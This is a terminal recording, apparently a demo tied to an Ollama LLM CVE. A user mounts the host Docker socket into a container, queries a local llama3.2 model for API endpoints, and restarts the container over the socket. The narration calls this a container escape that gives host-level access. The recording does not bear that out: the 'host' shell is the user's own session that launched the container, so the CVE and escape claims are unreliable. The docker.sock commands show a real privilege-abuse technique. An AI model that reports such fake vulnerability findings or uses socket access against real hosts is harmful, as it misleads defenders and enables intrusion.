asciinema play maf-cve-Ollama-LLM.cast vboxuser@Ubuntu-Server:~$ docker stop maf-exploit 2>/dev/null; docker rm maf-exploit 2>/dev/null docker run -d --name maf-exploit -v /var/run/docker.sock:/var/run/docker.sock python:3.11-slim tail -f /dev/null # Install tools inside the container docker exec maf-exploit apt-get update && docker exec maf-exploit apt-get install -y curl jq docker exec -it maf-exploit bash maf-exploit maf-exploit ddb12d2e6c087377389acd25a2c8efcb89e37e5ee38328dfe0ccb21f4b60cdac Hit:1 http://deb.debian.org/debian trixie InRelease Get:2 http://deb.debian.org/debian trixie-updates InRelease [47.3 kB] Get:3 http://deb.debian.org/debian-security trixie-security InRelease [43.4 kB] Get:4 http://deb.debian.org/debian trixie/main amd64 Packages [9671 kB] Get:5 http://deb.debian.org/debian trixie-updates/main amd64 Packages [5412 B] Get:6 http://deb.debian.org/debian-security trixie-security/main amd64 Packages [119 kB] Fetched 9886 kB in 2s (5552 kB/s) Reading package lists... Reading package lists... Building dependency tree... Reading state information... The following additional packages will be installed: bash-completion krb5-locales libbrotli1 libcom-err2 libcurl4t64 libgnutls30t64 libgssapi-krb5-2 libidn2-0 libjq1 libk5crypto3 libkeyutils1 libkrb5-3 libkrb5support0 libldap-common libldap2 libnghttp2-14 libnghttp3-9 libonig5 libp11-kit0 libpsl5t64 librtmp1 libsasl2-2 libsasl2-modules libsasl2-modules-db libssh2-1t64 libtasn1-6 libunistring5 publicsuffix Suggested packages: gnutls-bin krb5-doc krb5-user libsasl2-modules-gssapi-mit | libsasl2-modules-gssapi-heimdal libsasl2-modules-ldap libsasl2-modules-otp libsasl2-modules-sql The following NEW packages will be installed: bash-completion curl jq krb5-locales libbrotli1 libcom-err2 libcurl4t64 libgnutls30t64 libgssapi-krb5-2 libidn2-0 libjq1 libk5crypto3 libkeyutils1 libkrb5-3 libkrb5support0 libldap-common libldap2 libnghttp2-14 libnghttp3-9 libonig5 libp11-kit0 libpsl5t64 librtmp1 libsasl2-2 libsasl2-modules libsasl2-modules-db libssh2-1t64 libtasn1-6 libunistring5 publicsuffix 0 upgraded, 30 newly installed, 0 to remove and 3 not upgraded. Need to get 6135 kB of archives. After this operation, 19.5 MB of additional disk space will be used. Get:1 http://deb.debian.org/debian trixie/main amd64 bash-completion all 1:2.16.0-7 [319 kB] Get:2 http://deb.debian.org/debian trixie/main amd64 krb5-locales all 1.21.3-5 [101 kB] Get:3 http://deb.debian.org/debian trixie/main amd64 libbrotli1 amd64 1.1.0-2+b7 [307 kB] Get:4 http://deb.debian.org/debian trixie/main amd64 libkrb5support0 amd64 1.21.3-5 [33.0 kB] Get:5 http://deb.debian.org/debian trixie/main amd64 libcom-err2 amd64 1.47.2-3+b10 [25.0 kB] Get:6 http://deb.debian.org/debian trixie/main amd64 libk5crypto3 amd64 1.21.3-5 [81.5 kB] Get:7 http://deb.debian.org/debian trixie/main amd64 libkeyutils1 amd64 1.6.3-6 [9456 B] Get:8 http://deb.debian.org/debian trixie/main amd64 libkrb5-3 amd64 1.21.3-5 [326 kB] Get:9 http://deb.debian.org/debian trixie/main amd64 libgssapi-krb5-2 amd64 1.21.3-5 [138 kB] Get:10 http://deb.debian.org/debian trixie/main amd64 libunistring5 amd64 1.3-2 [477 kB] Get:11 http://deb.debian.org/debian trixie/main amd64 libidn2-0 amd64 2.3.8-2 [109 kB] Get:12 http://deb.debian.org/debian trixie/main amd64 libsasl2-modules-db amd64 2.1.28+dfsg1-9 [19.8 kB] Get:13 http://deb.debian.org/debian trixie/main amd64 libsasl2-2 amd64 2.1.28+dfsg1-9 [57.5 kB] Get:14 http://deb.debian.org/debian trixie/main amd64 libldap2 amd64 2.6.10+dfsg-1 [194 kB] Get:15 http://deb.debian.org/debian trixie/main amd64 libnghttp2-14 amd64 1.64.0-1.1 [76.0 kB] Get:16 http://deb.debian.org/debian trixie/main amd64 libnghttp3-9 amd64 1.8.0-1 [67.7 kB] Get:17 http://deb.debian.org/debian trixie/main amd64 libpsl5t64 amd64 0.21.2-1.1+b1 [57.2 kB] Get:18 http://deb.debian.org/debian trixie/main amd64 libp11-kit0 amd64 0.25.5-3 [425 kB] Get:19 http://deb.debian.org/debian trixie/main amd64 libtasn1-6 amd64 4.20.0-2 [49.9 kB] Get:20 http://deb.debian.org/debian trixie/main amd64 libgnutls30t64 amd64 3.8.9-3+deb13u2 [1468 kB] Get:21 http://deb.debian.org/debian trixie/main amd64 librtmp1 amd64 2.4+20151223.gitfa8646d.1-2+b5 [58.8 kB] Get:22 http://deb.debian.org/debian trixie/main amd64 libssh2-1t64 amd64 1.11.1-1 [245 kB] Get:23 http://deb.debian.org/debian trixie/main amd64 libcurl4t64 amd64 8.14.1-2+deb13u2 [391 kB] Get:24 http://deb.debian.org/debian trixie/main amd64 curl amd64 8.14.1-2+deb13u2 [270 kB] Get:25 http://deb.debian.org/debian trixie/main amd64 libonig5 amd64 6.9.9-1+b1 [189 kB] Get:26 http://deb.debian.org/debian trixie/main amd64 libjq1 amd64 1.7.1-6+deb13u1 [164 kB] Get:27 http://deb.debian.org/debian trixie/main amd64 jq amd64 1.7.1-6+deb13u1 [77.7 kB] Get:28 http://deb.debian.org/debian trixie/main amd64 libldap-common all 2.6.10+dfsg-1 [35.1 kB] Get:29 http://deb.debian.org/debian trixie/main amd64 libsasl2-modules amd64 2.1.28+dfsg1-9 [66.7 kB] Get:30 http://deb.debian.org/debian trixie/main amd64 publicsuffix all 20250328.1952-0.1 [296 kB] debconf: unable to initialize frontend: Dialog debconf: (TERM is not set, so the dialog frontend is not usable.) debconf: falling back to frontend: Readline debconf: unable to initialize frontend: Readline debconf: (Can't locate Term/ReadLine.pm in @INC (you may need to install the Term::ReadLine module) (@INC entries checked: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.40.1 /usr/local/share/perl/5.40.1 /usr/lib/x86_64-linux-gnu/perl5/5.40 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl-base /usr/lib/x86_64-linux-gnu/perl/5.40 /usr/share/perl/5.40 /usr/local/lib/site_perl) at /usr/share/perl5/Debconf/FrontEnd/Readline.pm line 8, line 30.) debconf: falling back to frontend: Teletype debconf: unable to initialize frontend: Teletype debconf: (This frontend requires a controlling tty.) debconf: falling back to frontend: Noninteractive Fetched 6135 kB in 1s (8568 kB/s) Selecting previously unselected package bash-completion. (Reading database ... 5645 files and directories currently installed.) Preparing to unpack .../00-bash-completion_1%3a2.16.0-7_all.deb ... Unpacking bash-completion (1:2.16.0-7) ... Selecting previously unselected package krb5-locales. Preparing to unpack .../01-krb5-locales_1.21.3-5_all.deb ... Unpacking krb5-locales (1.21.3-5) ... Selecting previously unselected package libbrotli1:amd64. Preparing to unpack .../02-libbrotli1_1.1.0-2+b7_amd64.deb ... Unpacking libbrotli1:amd64 (1.1.0-2+b7) ... Selecting previously unselected package libkrb5support0:amd64. Preparing to unpack .../03-libkrb5support0_1.21.3-5_amd64.deb ... Unpacking libkrb5support0:amd64 (1.21.3-5) ... Selecting previously unselected package libcom-err2:amd64. Preparing to unpack .../04-libcom-err2_1.47.2-3+b10_amd64.deb ... Unpacking libcom-err2:amd64 (1.47.2-3+b10) ... Selecting previously unselected package libk5crypto3:amd64. Preparing to unpack .../05-libk5crypto3_1.21.3-5_amd64.deb ... Unpacking libk5crypto3:amd64 (1.21.3-5) ... Selecting previously unselected package libkeyutils1:amd64. Preparing to unpack .../06-libkeyutils1_1.6.3-6_amd64.deb ... Unpacking libkeyutils1:amd64 (1.6.3-6) ... Selecting previously unselected package libkrb5-3:amd64. Preparing to unpack .../07-libkrb5-3_1.21.3-5_amd64.deb ... Unpacking libkrb5-3:amd64 (1.21.3-5) ... Selecting previously unselected package libgssapi-krb5-2:amd64. Preparing to unpack .../08-libgssapi-krb5-2_1.21.3-5_amd64.deb ... Unpacking libgssapi-krb5-2:amd64 (1.21.3-5) ... Selecting previously unselected package libunistring5:amd64. Preparing to unpack .../09-libunistring5_1.3-2_amd64.deb ... Unpacking libunistring5:amd64 (1.3-2) ... Selecting previously unselected package libidn2-0:amd64. Preparing to unpack .../10-libidn2-0_2.3.8-2_amd64.deb ... Unpacking libidn2-0:amd64 (2.3.8-2) ... Selecting previously unselected package libsasl2-modules-db:amd64. Preparing to unpack .../11-libsasl2-modules-db_2.1.28+dfsg1-9_amd64.deb ... Unpacking libsasl2-modules-db:amd64 (2.1.28+dfsg1-9) ... Selecting previously unselected package libsasl2-2:amd64. Preparing to unpack .../12-libsasl2-2_2.1.28+dfsg1-9_amd64.deb ... Unpacking libsasl2-2:amd64 (2.1.28+dfsg1-9) ... Selecting previously unselected package libldap2:amd64. Preparing to unpack .../13-libldap2_2.6.10+dfsg-1_amd64.deb ... Unpacking libldap2:amd64 (2.6.10+dfsg-1) ... Selecting previously unselected package libnghttp2-14:amd64. Preparing to unpack .../14-libnghttp2-14_1.64.0-1.1_amd64.deb ... Unpacking libnghttp2-14:amd64 (1.64.0-1.1) ... Selecting previously unselected package libnghttp3-9:amd64. Preparing to unpack .../15-libnghttp3-9_1.8.0-1_amd64.deb ... Unpacking libnghttp3-9:amd64 (1.8.0-1) ... Selecting previously unselected package libpsl5t64:amd64. Preparing to unpack .../16-libpsl5t64_0.21.2-1.1+b1_amd64.deb ... Unpacking libpsl5t64:amd64 (0.21.2-1.1+b1) ... Selecting previously unselected package libp11-kit0:amd64. Preparing to unpack .../17-libp11-kit0_0.25.5-3_amd64.deb ... Unpacking libp11-kit0:amd64 (0.25.5-3) ... Selecting previously unselected package libtasn1-6:amd64. Preparing to unpack .../18-libtasn1-6_4.20.0-2_amd64.deb ... Unpacking libtasn1-6:amd64 (4.20.0-2) ... Selecting previously unselected package libgnutls30t64:amd64. Preparing to unpack .../19-libgnutls30t64_3.8.9-3+deb13u2_amd64.deb ... Unpacking libgnutls30t64:amd64 (3.8.9-3+deb13u2) ... Selecting previously unselected package librtmp1:amd64. Preparing to unpack .../20-librtmp1_2.4+20151223.gitfa8646d.1-2+b5_amd64.deb ... Unpacking librtmp1:amd64 (2.4+20151223.gitfa8646d.1-2+b5) ... Selecting previously unselected package libssh2-1t64:amd64. Preparing to unpack .../21-libssh2-1t64_1.11.1-1_amd64.deb ... Unpacking libssh2-1t64:amd64 (1.11.1-1) ... Selecting previously unselected package libcurl4t64:amd64. Preparing to unpack .../22-libcurl4t64_8.14.1-2+deb13u2_amd64.deb ... Unpacking libcurl4t64:amd64 (8.14.1-2+deb13u2) ... Selecting previously unselected package curl. Preparing to unpack .../23-curl_8.14.1-2+deb13u2_amd64.deb ... Unpacking curl (8.14.1-2+deb13u2) ... Selecting previously unselected package libonig5:amd64. Preparing to unpack .../24-libonig5_6.9.9-1+b1_amd64.deb ... Unpacking libonig5:amd64 (6.9.9-1+b1) ... Selecting previously unselected package libjq1:amd64. Preparing to unpack .../25-libjq1_1.7.1-6+deb13u1_amd64.deb ... Unpacking libjq1:amd64 (1.7.1-6+deb13u1) ... Selecting previously unselected package jq. Preparing to unpack .../26-jq_1.7.1-6+deb13u1_amd64.deb ... Unpacking jq (1.7.1-6+deb13u1) ... Selecting previously unselected package libldap-common. Preparing to unpack .../27-libldap-common_2.6.10+dfsg-1_all.deb ... Unpacking libldap-common (2.6.10+dfsg-1) ... Selecting previously unselected package libsasl2-modules:amd64. Preparing to unpack .../28-libsasl2-modules_2.1.28+dfsg1-9_amd64.deb ... Unpacking libsasl2-modules:amd64 (2.1.28+dfsg1-9) ... Selecting previously unselected package publicsuffix. Preparing to unpack .../29-publicsuffix_20250328.1952-0.1_all.deb ... Unpacking publicsuffix (20250328.1952-0.1) ... Setting up libkeyutils1:amd64 (1.6.3-6) ... Setting up libbrotli1:amd64 (1.1.0-2+b7) ... Setting up libsasl2-modules:amd64 (2.1.28+dfsg1-9) ... Setting up libnghttp2-14:amd64 (1.64.0-1.1) ... Setting up krb5-locales (1.21.3-5) ... Setting up libcom-err2:amd64 (1.47.2-3+b10) ... Setting up libldap-common (2.6.10+dfsg-1) ... Setting up libkrb5support0:amd64 (1.21.3-5) ... Setting up libsasl2-modules-db:amd64 (2.1.28+dfsg1-9) ... Setting up bash-completion (1:2.16.0-7) ... Setting up libp11-kit0:amd64 (0.25.5-3) ... Setting up libunistring5:amd64 (1.3-2) ... Setting up libk5crypto3:amd64 (1.21.3-5) ... Setting up libsasl2-2:amd64 (2.1.28+dfsg1-9) ... Setting up libnghttp3-9:amd64 (1.8.0-1) ... Setting up libtasn1-6:amd64 (4.20.0-2) ... Setting up libkrb5-3:amd64 (1.21.3-5) ... Setting up libssh2-1t64:amd64 (1.11.1-1) ... Setting up publicsuffix (20250328.1952-0.1) ... Setting up libldap2:amd64 (2.6.10+dfsg-1) ... Setting up libonig5:amd64 (6.9.9-1+b1) ... Setting up libjq1:amd64 (1.7.1-6+deb13u1) ... Setting up libidn2-0:amd64 (2.3.8-2) ... Setting up libgssapi-krb5-2:amd64 (1.21.3-5) ... Setting up jq (1.7.1-6+deb13u1) ... Setting up libgnutls30t64:amd64 (3.8.9-3+deb13u2) ... Setting up libpsl5t64:amd64 (0.21.2-1.1+b1) ... Setting up librtmp1:amd64 (2.4+20151223.gitfa8646d.1-2+b5) ... Setting up libcurl4t64:amd64 (8.14.1-2+deb13u2) ... Setting up curl (8.14.1-2+deb13u2) ... Processing triggers for libc-bin (2.41-12+deb13u2) ... root@ddb12d2e6c08:/# root@ddb12d2e6c08:/# root@ddb12d2e6c08:/# root@ddb12d2e6c08:/# # [NARRATION: I am inside the MAF container. I will query the LLM for the Docker API endpoint.] curl -s http://host.docker.internal:11434/api/generate -d '{"model":"llama3.2","prompt":"What is the Docker API endpoint to restart a container?","stream":false}' | jq .response # [NARRATION: I will now fetch the container ID using the Docker API.] ID=$(curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json | jq -r '.[0].Id') echo "Container ID: $ID" # [NARRATION: Executing the escape now.] curl -s --unix-socket /var/run/docker.sock -X POST http://localhost/containers/$ID/restart Container ID: ddb12d2e6c087377389acd25a2c8efcb89e37e5ee38328dfe0ccb21f4b60cdac vboxuser@Ubuntu-Server:~$ vboxuser@Ubuntu-Server:~$ vboxuser@Ubuntu-Server:~$ vboxuser@Ubuntu-Server:~$ # [NARRATION: The container restarted, ejecting me back to the host.] whoami hostname # [NARRATION: Proving I have host-level Docker access.] docker ps vboxuser Ubuntu-Server CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES ddb12d2e6c08 python:3.11-slim "tail -f /dev/null" 42 seconds ago Up 11 seconds maf-exploit 3be3225f9f0a maf-nonroot-img "tail -f /dev/null" 54 minutes ago Up 54 minutes maf-nonroot vboxuser@Ubuntu-Server:~$ vboxuser@Ubuntu-Server:~$ vboxuser@Ubuntu-Server:~$ exit exit